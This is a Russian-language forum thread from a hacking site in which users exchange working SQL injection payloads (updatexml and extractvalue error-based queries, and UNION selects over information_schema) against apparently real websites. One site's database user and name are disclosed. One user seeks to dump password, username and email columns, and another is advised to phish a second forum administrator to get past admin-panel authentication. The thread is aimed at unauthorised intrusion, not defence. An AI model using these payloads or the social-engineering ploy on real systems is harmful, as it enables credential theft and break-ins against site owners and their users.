HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1281  
Старый 27.08.2016, 19:12
NonBlizz
Guest
Сообщений: n/a
Провел на форуме:
4644

Репутация: 0
По умолчанию

Не много запутался) есть уязвимость:

Код:
Code:
http://www.site.ru/publ.html'*updatexml(1,concat(0x3A,user(),version()),1)*'
version (5.1.69)а как мне вывести таблицы с information_schema....

P.S совсем башка не варит, колят магнезию(
 
Ответить с цитированием

  #1282  
Старый 27.08.2016, 19:34
demafly76
Guest
Сообщений: n/a
Провел на форуме:
6685

Репутация: 0
По умолчанию

Цитата:
Сообщение от NonBlizz  
NonBlizz said:

Не много запутался) есть уязвимость:
Код:
Code:
http://www.site.ru/publ.html'*updatexml(1,concat(0x3A,user(),version()),1)*'
version
(5.1.69)
а как мне вывести таблицы с information_schema....
P.S совсем башка не варит, колят магнезию(
extractvalue(rand(),concat(0x3a,(select+concat(0x3 a,table_name)+from+information_schema.tables+limit +0,1)))+--+
 
Ответить с цитированием

  #1283  
Старый 28.08.2016, 01:46
NonBlizz
Guest
Сообщений: n/a
Провел на форуме:
4644

Репутация: 0
По умолчанию

Код:
Code:
http://www.site.ru/pis.php/view/(2)union(select(1),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),3)
Вывел таблицы с БД.

Допустим есть таблица pwd.pwd-users c колонками pass,uname,email как мне вывести их содержимое за помощь ++

P.S Магнезия всё ещё долбит по шарам=)
 
Ответить с цитированием

  #1284  
Старый 28.08.2016, 03:00
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Цитата:
Сообщение от NonBlizz  
NonBlizz said:

Код:
Code:
http://www.site.ru/pis.php/view/(2)union(select(1),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),3)
Вывел таблицы с БД.
Допустим есть таблица pwd.pwd-users c колонками pass,uname,email как мне вывести их содержимое за помощь ++
P.S Магнезия всё ещё долбит по шарам=)
select concat(pass,uname,email) from pwd.pwd-users
 
Ответить с цитированием

  #1285  
Старый 28.08.2016, 09:06
NonBlizz
Guest
Сообщений: n/a
Провел на форуме:
4644

Репутация: 0
По умолчанию

Цитата:
Сообщение от BabaDook  
BabaDook said:

select concat(pass,uname,email) from pwd.pwd-users
Я уже так пробовал)) итог пустая страница, с from pwd.pwd-user limit 1,1 тоже

Точнее не то чтобы пустая страница, а просто не выводит инфу.

from pwd.pwd-user идёт же перед 3) ?
 
Ответить с цитированием

  #1286  
Старый 28.08.2016, 09:32
NonBlizz
Guest
Сообщений: n/a
Провел на форуме:
4644

Репутация: 0
По умолчанию

Цитата:
Сообщение от boyiciyez  
boyiciyez said:

http://www.legalsteroid.ru/'*updatexml(0,repeat((select+version()),2),2)*
'
как раскрутить в sqlmap или просто сдампить?)
немогу дальше понять как крутить
Другой вектор error-based пробуй.

Код:
Code:
http://www.legalsteroid.ru/'or(ExtractValue(1,concat(0x3a,(select(version())))))='1
version: 5.5.50-MariaDB

user: steroid_legal@localhost

database: steroid_legal

Дальше поймёшь?
 
Ответить с цитированием

  #1287  
Старый 29.08.2016, 02:26
NonBlizz
Guest
Сообщений: n/a
Провел на форуме:
4644

Репутация: 0
По умолчанию

Код:
Code:
http://site.ru/info/1'or(ExtractValue(1,concat(0x3a,(select(database())))))='1
Выводит...

Подскажите как извлечь инфу из Information.schema.. На примере этого запроса...

Пробывал так:

Код:
Code:
http://site.ru/info/1'or(extractvalue(rand(),concat(0x3a,(select+concat(0x3a,table_name)+from+information_schema.tables+limit+0,1)))+--+
выводит такую ошибку:



CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from+information_schema.tables+limit+0,1)))+--+') = 0 ) OR baner.id_baner IN (SE' at line 1


При запросе:

Код:
Code:
http://site.ru/info/1'and(extractvalue(1,concat(0x3a,(select(table_name)from(information_schema.tables)))))='1
CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[21000]: Cardinality violation: 1242 Subquery returns more than 1 row

Шо не так делаю?
 
Ответить с цитированием

  #1288  
Старый 29.08.2016, 16:26
R3hab
Guest
Сообщений: n/a
Провел на форуме:
31545

Репутация: 6
По умолчанию

есть форум на булке,так же есть данные админа,на форуме получается залогиниться,но когда перехожу по адресу site.ru/forum/admincp/ ,там стоит бейсик авторизация,можно как то ее обойти?
 
Ответить с цитированием

  #1289  
Старый 29.08.2016, 17:30
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от R3hab  
R3hab said:

есть форум на булке,так же есть данные админа,на форуме получается залогиниться,но когда перехожу по адресу site.ru/forum/admincp/ ,там стоит бейсик авторизация,можно как то ее обойти?
засоциалить другого админа. мы так похекали булку пару лет назад. было весело)

напиши другому админу в пм, мол пароль что то не подходит, может он сменил ее и забыл предупредить.
 
Ответить с цитированием

  #1290  
Старый 29.08.2016, 18:01
R3hab
Guest
Сообщений: n/a
Провел на форуме:
31545

Репутация: 6
По умолчанию

Цитата:
Сообщение от Konqi  
Konqi said:

засоциалить другого админа. мы так похекали булку пару лет назад. было весело)
напиши другому админу в пм, мол пароль что то не подходит, может он сменил ее и забыл предупредить.
то есть пароль от форума и админки могут отличатся?
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ